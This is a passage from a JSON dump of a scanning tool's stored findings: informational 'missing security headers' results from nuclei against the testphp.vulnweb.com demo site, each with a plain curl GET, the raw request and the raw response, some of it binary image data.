close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 3725\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:41:42 GMT\r\nEtag: "4dca64a1-e8d"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001c\u0001\u0004\u0003\u0001\u0001\u0002\u0003\u0004\u0005\u0006\u0007\b��2\u0010\u0002\u0001\u0003\u0003\u0003\u0003\u0003\u0003\u0003\u0004\u0003\u0001\u0002\u0003\u0004\u0011\u0005\u0012!\u00061A\u0013"Q\u00142a\u0007q�\u0015B�\b\u0016#3C����\u001b\u0001\u0001\u0005\u0001\u0001\u0002\u0003\u0005\u0006\u0007\u0001\u0004��2\u0011\u0001\u0003\u0003\u0002\u0003\u0005\u0007\u0004\u0003\u0001\u0002\u0003\u0004\u00111\u0005!\u0012\u0013A\u0014Qaq�\u0006"#����2���3R���\f\u0003\u0001\u0002\u0011\u0003\u0011?��W�z�M.�wow\n�C$\u0012��\u001b�2\t�\u0004\u001f��V���\u0013u\u001b;6���Ŏp6�I�l<����I$�\r���xU�/E�]���\u001b\u0018\u0002�\u0010I�8\u0002�_A��\u001f\t;7�^�J��\u0013^\u0006��MB��N�M�]�k\u001b0Ei�\b\u0019���54R$��\u001c�b��\u001c�����V�}���&�ng�\u001at���\u0010�V^�\u001eB7���܌��\u000b�д\u000bk\u0013!���#\u001a��\u001f��\u0017�\u0018��@\u001cq��x��C��2Xn����^W��9��,\u001a=J�\r\u0015��[�V��N�n./u\u0012�\\Or-�F���\u000b�\t����v\u001cg<F*\u0012��JYLR\rǟ�KST����E\u0014Q^e��c\f\u001aJy\u0019�+�\\�t8&�JF)+�h��(B(��\u0010�F))�)���M�QE\u0014%-#���<u|�q��,�\u000e\u0016(W�.�� �(9��!N\f̀�\u001d\u0002H����1��#��j�]��6\u001a��픆+�w\u0012D�\u0003�����G��u=\u000b�r�!D�4��p�5�\r��\n6����\u000eq��\u0003�6��h���ψq\u001e�\u001f�UA�k�J8/a��wS�6�\u0010�\u0015\u0002M�㴞\b����|V\u0011\u0014*\r�\u0011K���Υ�b�\u001a�����\u0015\u001c"�\u001c��\u0005\u0001�)9�\u0004\u00023��\u0003Vnt����,��\u0018\f�,�����\b����;�T\u0018#4�\u0003��$_��Lj�s\u001fτ�\u0003�5F�e}^�錛�˹Q�ܟݸn\\�2pI�\u000e\u0018��p�A\u001bD�$c+�\u001bP�\u000e�r�}�ی�2@�+E�X��l��I$�\\͈�1�\u0018.�\u0005���\u001cs�c\u0007�n�\u001f�\u0012K�Y�\u0017��\u000eO�6\u0001 \u0012pH\u001cx�5\u0013�hkj�����^�\u0003�і4�T��\u0019쥺{�B[�=�<\n\u0010 �\u001d�m9ov�y�\u0003�;�[Qm+�fԯ`\u0002HmIJB�\u0002\u0015����\u0001��8���\u00157�w���RH�/��nTz��\t��;C�\u000f\u0019\u0007;\\�����Ҽ��29\u0006H\u001bm�:)��{\u0014%�w��4\u000f�{�R�K\u001b�)R{���KA��y\u0019U)�� n%�p2ɮ���4gP�@%Cn�|���s\u001e���=\u0002���L�wH���\u0005Q���B�\u001carX�[�\u0018�^X�Z��\u000fy�R���n\u001e�\nѤ��$3����.s�d`�\r�U�\u0004��\u0011�1����\u000b�|�T\r\u000e���#��zӲ��dRm��-. �����x�`q��7WW�\u0019\u0004py�KTw���\u0015k�^&�\u0014dc�\u0015!\u0019�L#\u0014�\u0013�u�QE\u0015ĤS[�:���Rٔ�QEq8��\u0010x�>�\u0016ݣv{�J����wY\u000b��E@op\u0007\u001f4G4��,���J����YO��G�J�u1�p�\u0016�������:�]Һ��P����+i\u000b<\u0013�;�\u0002\n����c������2\u000b��m6+�\u0016�\u0019��\u0006H��2�\u0006�\u0002�\u0005H�H'#\f8��f�w��t���t�7���`��Z\u0003�����x\u0004�\f�q���ƈ+�|f�\u001e�R��@w����>$�2����h��P\u0010v��\u00078� \u000e\u000f\u001c5c���x`\u0019&\u0017b_�y \f\u00021�ry>\u0006\u0001���L~�麪J���:X��\u0018�2����l(,s�q��8�ߤ���^�]\t��\u0005e�\u0010\u0006��;�a�\u001d��L��g\u0015V��梮��45����c�u3Y<U\u0014�\u0010�\\G��(��\u0004S.S�v�)]�8?�T���U��6�g;U\u0007���\u0007�p+Ch?��eN�͂�z\\[\u000b\tV�=1\u0011f!��\u0018݁��+��O\u0003�\u0006Z����els\u001cq�����}�\u0003\u0005����\u0005\fFv��S�\u001dr�D��9��k���O\u0004!w˳n�\u0016*�\u0001��\u001d��\u0003�U5�uN�6�&�B�{i�h���e)\u0018dS��\u001e\t\u0019�\u00185\u001eA\u001b/{\\\u000e�EE<�0�\u001aE��������Er�a�$�\u0018���.�\u0015��(��u�$`\r7a��B\u0001MU\u0002�{=-�}�5^�q�(\\7)�3Y�#�5-\u001e?B�oRɑ����z���I]��;�v���TG����9��#A\u001e)��|f�6+���z]�\u0015�ݴ��͆��FSϴ��mĀ�\n\u0014}ÀvΐV��$��E��\b\u001d�d�z{�l0���A�\u0018\r��+�S�\u0015���̈:;U�\u0018��o�C\u001e��\fH\u0014�9�nq��\u001a��\\�Z\u0007�<c�\u001f\u001f�{�c\u0012�\u001er�\u001d�P�@��E\u001c��+�W�k�^?\u0004\u000f��S��M�\u00078=����Hc�y�� S#���\t��o�{)$g `�dR�-��b\u0002��\u001d(!^��L�\\�Z\u0005����J�,ņ\u0006;\fg����ߨ�a��ԗ\u001af�,Q�X��n�\u0004�%�9\u0019V�;�3�\u001cv[�k\u000b)�YA�����A�\u0019��\u000f��\u0016��\u001a���s~>�c{q$�4r\b�"�IȐ�<�Kc䚶�3Hǽ�5\r\u0016h�����Z�Ao���[WGu����jVs�(�}5�.^\u0010�\u00138bQ@]ː9<�}�kg�\u001f\u0007k.@8a�23��kJ�.��Ӭn.���P��E\n�\u001cl�\u0018����p�x>�ʫ)\u0015�A\u001b��Y$���Ycm�c�\u0018\\|g�{��Q��Բ�YL�X��\u0002�w/~�\u001c��:glz}n��\u0014����eWJ�n�\u0014QE\tK��S�?�\u001e���e��2�~����~(E�h��w���Tl�⤢�\u0003eRH�v��@�\u0004�3�\t<e~���W\b��vn\u0018n\u0001�y ��\u0012��G\u0016��)�6ޙ �������3\u001b��?\u0014�7\u0002\u0017�l��Դ�.QU��E�#�~8#8$g���ޑ-�^��Kp���aLͱG~\u0013;s�8�'�q\\�􃨮.\u0012]\u001a�帒\u0012\u001a\u0007 �H�\u0014�\u0003\u0001U��'�'\u001c\fV��j����Z��%\t\u001eb�Uf�;\u0010�X/%w0�9�k*�����4;���\u0015ޒx*!�:�\u0019X�n�^�%�\u0001�0�F�I��\u0018��8 \u001c��d2�\u0007���ŧY�a�8�t��Q\u0019db��\u0018��I\u0018�rN1��V8�\u0015�QD�Jv���\u001fUI������D�K[�qf���*�m\u0004�\u0019�?8�#=�Z����.��I�C��b��\u001c[��#ö<n\bW�\u0005��8 �9��6IP�\t���yq\u001c��7PA��=��\u0015�0 1�+s��2\u0006pO��*�9.����d��=R�d<��\\��\u001f��l���\u000f�ț,\be�q�8$v�<g�\u0017�y���M�ҭ�./�`N@P\u0019�\u0004�\u00120q�ۃ�v\u0016\u001b�"��Ťv2q���ѩ��\u001eI(��ez\u0017������F�(��$�(?ju\u0015�ۨ�~iʠS��Ⱥ\u0001 �RJŁ&��v���\u0005\u0001:\u000b��+������>U���ߐFA\u001eA"��D�V}C���\u0005\f���wo'��\u0019'i�T��|�������\u001c�CE֯�[�u�ʊ���H�ш�q�\u0016\\�\u001c3\f�j\u001fX�;|<,6p�|���ON���]���Wf�ڰ.�Vu \u0015�\u0006\u0016@G�9<\u001e���\u001d�����Giz�Ŕ:��ۥ���T��h��z��\u0006=�vFs�r\t�4�s^�7��Ý�\u0011�FW��>T�\ft�V$��O�[����\u0013\bcc#M\u0004�\u0019W����Gܮ\u001c��\n~r(i��jw\u0006\u0018Z<�/���F��x\u0007\u0004�b21��m�u�XZ�*�Fھ��ҰEM��$*������c���D}��RzE\u0003��H���a��\u001a�{�0���s����2�(��ך�\u00063ڢ����F�(��"�(�\b��(Bl�mEE\u0015Ġ�\u0006�'=袄���\u000e�w�j�wd�:�Y\u0018e%O(�ʜv�\u00020@5�:�6WWqDIX����q�E\u0015�n�\u0007����x�ߴ�+m6��e\nč#;rX�\u001e�I$��w�\u0006�\\0\u0017�7��U\u0003\r\u0018\u000b��\u0011��9\u0018�\u0004w�<`��Ⱦ$�/����*�rțö>�W��\u0013�O.�=�П�.�\u0004\u0001��c�Y!\n��Wv�v�\u0019e\u0007�\u0015��f��ӧ��mn����B������8ݑ�؁��<`��(�:��\u000f�L�Od�����1��igw|��)��\u0004��\u00078����;�98�@�E\u0015\u0017�1���E�\u001f`�����\u0002�}���", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 791, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51' 'http://testphp.vulnweb.com/cgi-bin/1'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/cgi-bin/1", + "discovered_date": "2024-11-13T02:42:01.395Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /cgi-bin/1 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=iso-8859-1\r\nDate: Wed, 13 Nov 2024 02:41:39 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL was not found on this server.</p>\n<hr>\n<address>Apache/2.4.46 (Ubuntu) Server at localhost Port 8000</address>\n</body></html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 792, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586' 'http://testphp.vulnweb.com/pictures/2.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/2.jpg.tn", + "discovered_date": "2024-11-13T02:42:01.562Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/2.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 1353\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:41:42 GMT\r\nEtag: "4dca64a1-549"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001a\u0002\u0003\u0001\u0001\u0002\u0001\u0003\u0004\u0005\u0006��+\u0010\u0002\u0002\u0001\u0004\u0002\u0002\u0004\u0007\u0001\u0002\u0011\u0003\u0004\u0012!1AQ"a\u00142q�\u0005\u0013$B�����\u001b\u0001\u0002\u0003\u0001\u0001\u0001\u0003\u0001\u0002\u0004\u0005\u0006\u0007��'\u0011\u0002\u0002\u0001\u0004\u0002\u0002\u0001\u0005\u0001\u0001\u0002\u0011\u0003\u0004\u0012!1\u0005Q\u00132A"#3aq���\f\u0003\u0001\u0002\u0011\u0003\u0011?���d�H䏺JU�\t\u000f\b�i{\u0015+f�.7<������B6�˨����͒\u001bdס\u001a�i�E�n�_��%\u001atN\f�pR�H\u001d�,֝�\u0001 \u0014@'DQ\u0003Qu?b�-\u0010\u0005�L\t-\u0005�\u0001��\fH�'A\u0015F�\u001a�ʔ?z3G�^�|����b�#����K�)�ۓ�l�%��"䨤�\u001f�u\u0015Ed44�2\u0005�S�D\u0002Y\u0005F�`H\u0001\r\u0011L`"�)4(\fF�,�����\u0003%C�9��1F�$�c$��\u000f�~�Q_�ק{c'K�#��r|�R��(�Ԥ�I}#;��k�ʚ��ϳf���EmZ\u0010��\u0012Kȶ�А��C\u0001Z\u001a�B�\u0006Ҵ1I\n\u0004�X�\u001com�\u0004�,�7\u000e�}�\\1�,�\u001f\u0017��#�wG�ϫ�\u0016���dPf�<\u0013�K��G�4j��\u001c�i�$���a���j�4C\u000b���g�8�`�.�Μy)�N��?��j��\u001a�*�w\u0016�����),\u0012�5b����/�g%��[7e�b�\u001a�/�$�fiƎ֛3�����Х�5b�ޥ�@%Ţ\b\u0019v\u0014E\u0012M�(�\u0018\b�w1h��(���\u001e\u001a7��C\u001c���_�\f{,��َ[]��kp��p}\u001d?ĹI��'�&�jq���0����WO����kV���}\u001bq�|�c]�q5\u0018��p\u0013�J�3��]Fhe�\u0018��K�4�%r}��W��à��d�h�}��-�\\��\u001c�E��+B�+^�4j��\u0004\u0010�}�\u0004\fN�qb�Qe?e`6�\u001b~Ȣې�6߲v��܄&��\u0014C��J�x�\n>njlԑ��5CEY�3��j=�\nʱ��եj�б�N����f�p���k3��Ҿ�9���}3t���ψ�2J4�N\rvt���O��\u0018��>�q�%��\t��\u001fB��e�\u001bJ�\u001e�QM"(�»^,]�e\\FG2k�WAC�\r��.�bPQf���t[^\tP��Σ�(���\u00126�6�YlJ&���I\u0013D<���d\u0017 \u0006��p2�\u000e��m%\u000e6���uc���V��}��\u001dl*⏝y�J\u0019�K�Nn�N\u0012x�䋤rr%`\u0006-W���\u0013���Ed(�\u0003!�����P�8��k��\u0005)�?,+���;5\u0012�\f2���+��\u0004��e�2�\t7�6-"v�\u0001f�d�&ͺXA���Sh~�\\�W���%O��r��c\u0014�\u0004>Ό\u001b�CHe\u0014\b��\u0007��", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 793, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L", + "discovered_date": "2024-11-13T02:42:01.735Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3/3L HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Laser Color Printer HP LaserJet M551dn, A4</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 794, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testphp.vulnweb.com/cgi-bin'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/cgi-bin", + "discovered_date": "2024-11-13T02:42:01.895Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /cgi-bin HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 403 Forbidden\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=iso-8859-1\r\nDate: Wed, 13 Nov 2024 02:41:39 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access this resource.</p>\n<hr>\n<address>Apache/2.4.46 (Ubuntu) Server at localhost Port 8000</address>\n</body></html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 795, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2", + "discovered_date": "2024-11-13T02:42:02.073Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/Details/web-camera-a4tech/2 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 796, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3", + "discovered_date": "2024-11-13T02:42:02.236Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Web Camera A4Tech PK-335E</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 797, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 Edg/92.0.902.62' 'http://testphp.vulnweb.com/_mmServerScripts'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/_mmServerScripts", + "discovered_date": "2024-11-13T02:42:02.408Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /_mmServerScripts HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 Edg/92.0.902.62\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /_mmServerScripts/</title></head>\r\n<body>\r\n<h1>Index of /_mmServerScripts/</h1><hr><pre><a href="../">../</a>\r\n<a href="MMHTTPDB.php">MMHTTPDB.php</a> 11-May-2011 10:27 2111\r\n<a href="mysql.php">mysql.php</a> 11-May-2011 10:27 10634\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 798, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0' 'http://testphp.vulnweb.com/bxss/adminPan3l'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/bxss/adminPan3l", + "discovered_date": "2024-11-13T02:42:02.584Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /bxss/adminPan3l HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:35 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<head>\n <title>Administrative panel</title> \n <link rel="stylesheet" type="text/css" href="style.css"> \n</head>\n \n<body>\n<p> \n <center>\n <img src="http://www.acunetix.com/wp-content/themes/acunetix/images/logo.png" alt="Acunetix website security">\n <h2>Administrative Panel</h2>\n </center>\n</p> \n \n<b>Last 100 visitors on this 